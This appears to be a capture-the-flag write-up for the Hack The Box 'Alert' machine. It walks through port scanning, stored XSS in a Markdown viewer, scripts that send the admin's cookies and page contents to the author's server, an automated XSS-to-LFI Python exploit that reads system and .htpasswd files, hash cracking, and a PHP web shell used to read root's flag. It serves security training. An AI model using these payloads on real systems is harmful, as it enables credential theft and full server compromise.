Alert

March 23, 2025

---

Created by	Page	Difficulty	OS
FisMatHack	Hack The Box	Easy	Linux

---

• The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports.

    nmap -p- --open --min-rate 5000 -Pn -sS 10.10.11.44 -oG scan
    /opt/extractports scan
    nmap -p22,80 -sCV -Pn 10.10.11.44 -oN ports
  

  

• I found the domain alert.htb and I add it to the file in the hosts file.

• When I enter the website I find several sections. Inside about us we see a description that makes us think that we can send a message to the administrator and it will be executed automatically.

  

• In the contact us section we can validate if this previous thought is correct. We set up a web server with python and send in the message content a reference to our server. We observe that we get the request that we have defined.

    test <script src=http://10.10.14.11:8000/pepe></script>
  

  

• At this point I try to get the session cookie from the administrator. I send him within the comments a request against my server containing in the url his cookie, but when I get the request I notice that he doesn’t have it.

    <script src="http://10.10.14.11/script.js"></script>
    # and script.js contains
    fetch('http://10.10.14.11/from_script/' + document.cookie);
  

• I notice that when switching between pages only one parameter of the url changes so I decide to apply brute force to try to find new endpoints.

    wfuzz -c --hw 52 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://alert.htb/index.php?page=FUZZ" 
  

  

• I find the endpoint “messages” but it does not show anything.

• I try to find subdomains and I manage to find one. When accessing it asks for credentials but I don’t have any at the moment.

    ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u 'http://alert.htb'  -H 'Host: FUZZ.alert.htb'
  

  

• Going back to the alert.htb endpoints, I have the main one that allows to upload “.md” file. Once uploaded it allows me to observe its content. I decide to validate if it is vulnerable to XSS injections by uploading a simple file with an alert and I verify that it is.

    pepe
    <img src=x onerror=alert(1) />
  

  

• Combining the different findings I try to read the content of the page I found earlier, “messages”. For it I create a file that I am going to upload in the part of “Markdown viewer” with extension .md that makes a request to section of messages and that later forwards the obtained answer to my server.

• To avoid problems, I convert the content of the request to base64.

     <script>
    fetch("http://alert.htb/index.php?page=messages")
        .then(response => response.text())
        .then(data => {
            fetch("http://10.10.14.11/test=" + btoa(data));
            })
  		 
    </script>
  

• When I upload it, it generates a link with which I can access my file. I pass this link through the contact us section to the administrator so that he can access it.

    asdf <script src=http://alert.htb/visualizer.php?link_share=67dfdf2836c0f2.84080614.md></script>
  

• I receive the request in base64. When I convert it I can see that the administrator can see a different content than the one in the attached messages.

  

• I decide to create a python script to automate this process and try to read that file that I could not see at first.
• Changing the first script so that it stops pointing to the messages section and now points to the file I can see its content but it is empty.

• I decide to try to make a request to view internal system files (LFI) using a directory path traversal and I manage to read internal files.

    import os
    import sys
    import re
    import requests
  	
    target_url = "http://alert.htb/messages.php?file=../../../../../../../../../../../../etc/hosts"  
  	
    url_upload = "http://alert.htb:80/visualizer.php"
    headers_upload = {
        "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryXs1NS5MBWtbasWXg"
    }
    data_upload = "------WebKitFormBoundaryXs1NS5MBWtbasWXg\r\nContent-Disposition: form-data; name=\"file\"; filename=\"message.md\"\r\nContent-Type: text/markdown\r\n\r\n<script>\nfetch('"+target_url+"')\n.then(response => response.text())\n.then(data => {\n fetch(\"http://10.10.14.11/data=\" + btoa(data));\n})\n</script>\n\r\n------WebKitFormBoundaryXs1NS5MBWtbasWXg--\r\n"
    response_upload = requests.post(url_upload, headers=headers_upload, data=data_upload)
  	
    urls = re.findall(r'http://[^\s"]+', response_upload.text)
  	
  	
    if (urls):
        print(urls[-1])
    else:
        exit(1)
  	
    url_contact = "http://alert.htb:80/contact.php"
    headers_contact = {
    "Cache-Control": "max-age=0", "Origin": "http://alert.htb", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8", "Sec-GPC": "1", "Accept-Language": "en-US,en;q=0.6", "Referer": "http://alert.htb/index.php?page=contact", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}
    data_contact = {"email": "a@a.com", "message": "test test <script src="+urls[-1]+"></script>"}
    response_contact = requests.post(url_contact,headers=headers_contact, data=data_contact)
  

  

• By trying different paths I manage to find a file that apparently belongs to the other subdomain we had previously found and contains a credential of the user alber.

    http://alert.htb/messages.php?file=../../../../../../../../../../../var/www/statistics.alert.htb/.htpasswd
  

  

• I use hashcat and manage to find the user’s password.

    hashcat -m 1600 -a 0 hash2.txt /usr/share/wordlists/rockyou.txt
  

• With these credentials and using ssh I can connect to the system and I can read the first flag.

• Once inside the system I list the ports that are in use and I notice that 8080 is being used.

  

  

• I share the port using chisel to my machine to be able to access this new web. I can’t find anything relevant.

• The directory where the files of this web page are located has full permissions for all users.

  

• I create a file that allows me to execute commands as the user that is running the server (root), and thanks to this I can read the system’s senguda flag.

<?php system($_GET['cmd']);?>

curl --path-as-is 'http://localhost:8080/monitors/a.php?cmd=cat%20/root/root.txt'